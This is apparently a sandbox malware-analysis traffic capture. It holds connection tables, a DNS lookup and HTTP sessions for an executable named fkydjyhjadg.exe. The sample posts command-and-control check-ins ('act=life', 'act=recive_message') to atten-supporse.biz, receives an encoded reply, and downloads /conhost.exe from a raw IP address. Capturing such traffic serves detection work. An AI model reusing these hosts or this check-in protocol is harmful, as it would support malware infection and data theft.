                                                                        Nov 30, 2024 22:30:29.533338070 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.533345938 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.541735888 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.541781902 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.541789055 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.589936018 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.643102884 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.683700085 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.683718920 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728256941 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728287935 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728306055 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.728319883 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728358984 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.728365898 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728384018 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728423119 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.728547096 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.728565931 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.728575945 CET49707443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.728583097 CET44349707172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.839622021 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.839643002 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:29.839715958 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.840169907 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:29.840181112 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:31.200746059 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:31.200859070 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:31.202172041 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:31.202183008 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:31.202409983 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:31.203493118 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:31.203618050 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:31.203655958 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:32.333179951 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:32.333260059 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:32.333302975 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:32.333467960 CET49708443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:32.333477020 CET44349708172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:32.490160942 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:32.490190983 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:32.490264893 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:32.490639925 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:32.490657091 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:33.849153996 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:33.849234104 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:33.850527048 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:33.850533009 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:33.851058960 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:33.852293968 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:33.852436066 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:33.852504969 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:33.852560997 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:33.899333954 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:34.747731924 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:34.747834921 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:34.747898102 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:34.768475056 CET49709443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:34.768498898 CET44349709172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:35.440025091 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:35.440072060 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:35.440129995 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:35.440707922 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:35.440721035 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:36.656899929 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:36.656991005 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:36.658245087 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:36.658251047 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:36.658480883 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:36.662481070 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:36.662601948 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:36.662632942 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:36.662727118 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:36.662734985 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:37.856230974 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:37.856327057 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:37.856386900 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:38.212505102 CET49710443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:38.212537050 CET44349710172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:38.724136114 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:38.724186897 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:38.724247932 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:38.724591970 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:38.724610090 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.015224934 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.015291929 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:40.017123938 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:40.017131090 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.017359018 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.018771887 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:40.018893003 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:40.018898964 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.876966953 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.877068043 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:40.877147913 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:40.877708912 CET49711443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:40.877747059 CET44349711172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:41.985409975 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:41.985471964 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:41.985542059 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:41.985908031 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:41.985925913 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.202337980 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.202590942 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.206296921 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.206309080 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.206564903 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.212477922 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.212477922 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.212522030 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.213438034 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.213476896 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.214354038 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.214402914 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.214551926 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.214580059 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.214724064 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.214760065 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.214937925 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.214963913 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.214972019 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.214984894 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.215116024 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.215142012 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.215173006 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.215502977 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.215532064 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.259322882 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.259481907 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.259524107 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.259555101 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.259572983 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:43.259628057 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:43.259649038 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:46.389887094 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:46.389965057 CET44349714172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:46.390217066 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:46.390270948 CET49714443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:46.399449110 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:46.399487019 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:46.399549961 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:46.399862051 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:46.399874926 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:47.704998970 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:47.705064058 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:47.706497908 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:47.706506968 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:47.706753969 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:47.708097935 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:47.708203077 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:47.708240986 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:48.487804890 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:48.487896919 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:48.488164902 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:48.488274097 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:48.488289118 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:48.488297939 CET49715443192.168.2.8172.67.165.166
                                                                        Nov 30, 2024 22:30:48.488303900 CET44349715172.67.165.166192.168.2.8
                                                                        Nov 30, 2024 22:30:48.489938021 CET4971680192.168.2.8147.45.47.81
                                                                        Nov 30, 2024 22:30:48.609827995 CET8049716147.45.47.81192.168.2.8
                                                                        Nov 30, 2024 22:30:48.609935999 CET4971680192.168.2.8147.45.47.81
                                                                        Nov 30, 2024 22:30:48.610131979 CET4971680192.168.2.8147.45.47.81
                                                                        Nov 30, 2024 22:30:48.730140924 CET8049716147.45.47.81192.168.2.8
                                                                        Nov 30, 2024 22:31:10.539182901 CET8049716147.45.47.81192.168.2.8
                                                                        Nov 30, 2024 22:31:10.539325953 CET4971680192.168.2.8147.45.47.81
                                                                        Nov 30, 2024 22:31:10.539407969 CET4971680192.168.2.8147.45.47.81
                                                                        Nov 30, 2024 22:31:10.659360886 CET8049716147.45.47.81192.168.2.8
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 30, 2024 22:30:23.811773062 CET6504553192.168.2.81.1.1.1
                                                                        Nov 30, 2024 22:30:23.949934006 CET53650451.1.1.1192.168.2.8
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 30, 2024 22:30:23.811773062 CET192.168.2.81.1.1.10x812bStandard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 30, 2024 22:30:23.949934006 CET1.1.1.1192.168.2.80x812bNo error (0)atten-supporse.biz172.67.165.166A (IP address)IN (0x0001)false
                                                                        Nov 30, 2024 22:30:23.949934006 CET1.1.1.1192.168.2.80x812bNo error (0)atten-supporse.biz104.21.16.9A (IP address)IN (0x0001)false
                                                                        • atten-supporse.biz
                                                                        • 147.45.47.81
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.849716147.45.47.81807644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 30, 2024 22:30:48.610131979 CET198OUTGET /conhost.exe HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Host: 147.45.47.81


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.849706172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:25 UTC265OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-11-30 21:30:27 UTC1016INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=o91hc0r6qchio6b3248d3h56u6; expires=Wed, 26-Mar-2025 15:17:05 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2Flnc%2FtDvkQ9BrGfyyYsxr1bo1ut6wcPPwiiAlt1vmAh%2BFQQsdVEeAIWnZHbJ0c7UXO5FmSPTMoYtq2wy5wy8mNWBXda4LwwlLOF32Hg5AD2EO4pxmycLDfwcvvK9sWPkEoTvdI%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf0490ef6176c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2425&min_rtt=1996&rtt_var=1607&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=537753&cwnd=252&unsent_bytes=0&cid=f6a6f926eb527742&ts=1734&x=0"
                                                                        2024-11-30 21:30:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-11-30 21:30:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.849707172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:28 UTC266OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 49
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:28 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 26 6a 3d
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@distez&j=
                                                                        2024-11-30 21:30:29 UTC1022INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=crartmar00j6vm4v43vgtoder3; expires=Wed, 26-Mar-2025 15:17:08 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SpygToaU11mG%2BkEGhgUcGUImHgOyLRc3%2Bm3XZb%2BhoKI1F4VnTj%2BBnyiPMo27f17LCa0mmoSzjE%2FmXsApWUSEi9qltza45l3QWvnqVkqUScr5iUu9pHZ8s9paQ0DqWpjShdUBOYI%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf0595fed8c84-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=15850&min_rtt=1836&rtt_var=9147&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=951&delivery_rate=1590413&cwnd=166&unsent_bytes=0&cid=cd55f982707c509c&ts=1121&x=0"
                                                                        2024-11-30 21:30:29 UTC347INData Raw: 31 64 39 33 0d 0a 67 66 53 37 6a 43 6d 30 43 2b 34 56 36 44 6c 74 74 78 42 56 58 58 76 39 42 5a 72 58 42 7a 59 31 73 6e 64 4a 45 4c 57 67 44 67 44 36 31 73 32 75 45 34 41 6e 7a 47 61 4e 47 31 66 44 59 69 41 34 56 39 39 6b 2f 76 55 39 55 46 54 65 42 43 77 38 6c 39 5a 6a 49 72 75 53 32 75 42 61 30 53 66 4d 63 4a 41 62 56 2b 78 72 64 7a 67 56 33 7a 2b 34 73 6d 31 55 56 4e 34 56 4b 48 76 61 30 47 4a 6a 36 5a 6a 63 35 45 7a 58 62 34 39 35 68 56 77 49 30 6e 45 2f 4d 78 4b 51 62 66 66 31 4b 78 52 51 79 46 56 7a 4d 76 6a 46 65 6d 48 4d 6c 63 6a 6e 43 38 6b 6e 6c 54 65 4e 56 30 2b 4e 4d 6a 51 34 47 5a 46 6a 2f 72 78 76 58 6c 33 57 46 43 31 36 78 63 6c 6f 61 4f 6d 57 33 2b 56 47 33 6e 75 43 63 34 4a 58 44 74 68 78 64 33 46 5a 6d 48 2b 34 37 53 55 48 5a 64 4d 45 4f
                                                                        Data Ascii: 1d93gfS7jCm0C+4V6DlttxBVXXv9BZrXBzY1sndJELWgDgD61s2uE4AnzGaNG1fDYiA4V99k/vU9UFTeBCw8l9ZjIruS2uBa0SfMcJAbV+xrdzgV3z+4sm1UVN4VKHva0GJj6Zjc5EzXb495hVwI0nE/MxKQbff1KxRQyFVzMvjFemHMlcjnC8knlTeNV0+NMjQ4GZFj/rxvXl3WFC16xcloaOmW3+VG3nuCc4JXDthxd3FZmH+47SUHZdMEO
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 72 76 57 33 2b 42 4b 32 32 6d 65 66 34 46 51 43 73 64 35 50 6a 49 55 6e 32 72 79 75 6d 5a 55 55 4e 6f 66 4a 48 6a 54 7a 32 46 6b 34 35 61 5a 6f 41 76 52 63 63 77 76 79 6e 67 4b 78 58 55 37 4b 56 75 6c 4a 2b 66 37 66 42 52 51 33 46 56 7a 4d 74 2f 48 62 32 48 6f 6d 64 72 6d 51 4d 52 70 6e 6e 47 48 58 68 33 54 64 7a 6b 31 47 6f 31 74 39 72 4e 6d 58 56 7a 5a 45 43 78 32 6c 34 77 73 5a 66 76 57 67 61 35 71 32 32 4b 41 66 5a 31 62 54 38 6f 38 4c 6e 38 65 6b 79 65 67 39 57 46 56 55 39 45 52 4a 58 7a 54 7a 6d 70 73 37 70 6e 66 35 45 76 52 59 34 52 2f 69 31 59 45 32 6e 49 79 4d 68 32 5a 61 2f 6d 77 4a 52 6f 58 31 77 31 72 4b 70 66 73 61 32 48 78 31 4f 7a 74 52 64 68 75 6d 6a 65 56 46 52 61 56 64 54 74 2f 51 64 39 70 2f 62 70 33 56 55 58 56 47 7a 6c 2b 30 73 52 68
                                                                        Data Ascii: rvW3+BK22mef4FQCsd5PjIUn2ryumZUUNofJHjTz2Fk45aZoAvRccwvyngKxXU7KVulJ+f7fBRQ3FVzMt/Hb2HomdrmQMRpnnGHXh3Tdzk1Go1t9rNmXVzZECx2l4wsZfvWga5q22KAfZ1bT8o8Ln8ekyeg9WFVU9ERJXzTzmps7pnf5EvRY4R/i1YE2nIyMh2Za/mwJRoX1w1rKpfsa2Hx1OztRdhumjeVFRaVdTt/Qd9p/bp3VUXVGzl+0sRh
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 7a 74 52 64 68 75 6d 6a 65 56 46 52 61 56 64 54 74 2f 51 64 39 72 38 62 56 75 58 6c 50 51 45 69 5a 33 31 4d 56 76 62 2b 53 63 31 2b 6c 50 32 6d 43 42 63 59 70 63 43 39 42 67 4d 6a 59 56 6b 79 65 32 39 57 4a 4d 46 34 68 56 42 48 58 42 77 55 4e 68 38 70 2b 5a 38 51 58 50 4b 59 74 37 79 67 4e 50 30 6e 63 2f 4e 42 2b 58 5a 2b 71 77 61 31 39 57 32 68 4d 71 66 39 76 45 62 47 50 6a 6b 4e 58 75 54 4e 46 37 6e 6e 4b 4d 53 51 57 56 50 48 63 34 41 64 38 2f 75 49 4e 31 51 30 62 47 56 78 35 78 32 63 78 72 64 4b 4f 4a 6c 2f 63 4c 30 57 58 4d 4c 38 70 51 44 39 6c 31 50 7a 6b 64 6c 32 6a 33 76 48 64 56 57 39 34 48 4c 48 4c 65 7a 47 4e 75 36 70 76 65 34 30 44 63 5a 49 68 77 69 78 74 42 6c 58 55 76 66 30 48 66 55 65 69 34 61 58 70 63 33 42 78 72 62 5a 6e 62 4c 47 58 76 31
                                                                        Data Ascii: ztRdhumjeVFRaVdTt/Qd9r8bVuXlPQEiZ31MVvb+Sc1+lP2mCBcYpcC9BgMjYVkye29WJMF4hVBHXBwUNh8p+Z8QXPKYt7ygNP0nc/NB+XZ+qwa19W2hMqf9vEbGPjkNXuTNF7nnKMSQWVPHc4Ad8/uIN1Q0bGVx5x2cxrdKOJl/cL0WXML8pQD9l1Pzkdl2j3vHdVW94HLHLezGNu6pve40DcZIhwixtBlXUvf0HfUei4aXpc3BxrbZnbLGXv1
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 58 5a 34 4e 32 6a 6c 34 4b 30 58 55 7a 4f 52 62 66 4b 62 69 79 66 52 51 50 6b 44 6f 4d 52 35 58 6a 56 69 4c 38 32 4d 43 75 54 4e 6f 70 31 44 65 47 57 41 50 64 66 54 45 32 46 5a 56 75 38 37 6c 75 55 46 76 5a 45 43 31 7a 30 73 64 74 5a 75 2b 63 33 2b 31 49 32 57 61 44 66 38 6f 56 54 39 4a 71 64 32 64 5a 75 6e 44 7a 75 32 4d 55 53 4a 34 4d 61 33 58 62 67 6a 51 69 37 35 2f 66 36 45 37 61 61 49 70 2f 6a 31 4d 4c 31 48 51 78 50 42 61 62 59 76 6d 36 59 56 68 5a 32 68 51 71 66 74 7a 4e 5a 32 65 6a 32 4a 6e 70 55 35 59 78 7a 45 61 4a 54 52 6a 46 66 6e 63 67 56 34 59 6e 2f 37 6b 6c 44 42 66 52 42 79 46 34 32 63 64 6a 5a 2b 43 5a 33 75 4e 4e 32 6d 4f 46 66 34 78 55 42 73 64 78 4f 7a 45 65 6b 57 76 32 75 47 39 58 57 70 42 62 61 33 58 50 67 6a 51 69 7a 35 48 55 77 45
                                                                        Data Ascii: XZ4N2jl4K0XUzORbfKbiyfRQPkDoMR5XjViL82MCuTNop1DeGWAPdfTE2FZVu87luUFvZEC1z0sdtZu+c3+1I2WaDf8oVT9Jqd2dZunDzu2MUSJ4Ma3XbgjQi75/f6E7aaIp/j1ML1HQxPBabYvm6YVhZ2hQqftzNZ2ej2JnpU5YxzEaJTRjFfncgV4Yn/7klDBfRByF42cdjZ+CZ3uNN2mOFf4xUBsdxOzEekWv2uG9XWpBba3XPgjQiz5HUwE
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 63 70 68 4a 54 35 73 79 4d 43 64 5a 78 79 66 4f 73 6e 56 45 56 4a 49 6b 50 58 48 42 79 57 46 75 6f 34 6d 58 39 77 76 52 5a 63 77 76 79 6c 30 41 33 48 45 34 50 68 43 54 61 76 32 38 59 46 56 52 31 42 38 68 63 74 48 45 62 57 66 70 6c 64 6a 6b 51 74 46 68 69 33 53 59 47 30 47 56 64 53 39 2f 51 64 39 4f 2f 36 64 72 52 42 66 50 57 7a 49 79 30 4d 34 73 4f 71 4f 53 30 2b 46 50 30 57 57 4b 63 6f 78 57 44 74 70 7a 4e 7a 41 64 6c 47 37 2b 74 47 68 52 57 74 51 48 49 58 6e 59 7a 6d 56 75 37 74 61 58 72 6b 7a 4f 4b 64 51 33 75 31 59 42 32 33 55 68 66 77 62 52 66 72 69 79 61 52 51 50 6b 42 51 6e 66 64 54 4e 62 32 48 69 6e 4d 76 38 52 39 39 68 69 58 75 42 56 51 6e 48 64 44 67 32 47 70 78 75 2f 37 31 70 58 6c 54 58 56 57 55 79 30 4e 6f 73 4f 71 4f 31 7a 76 35 47 6c 6e 62
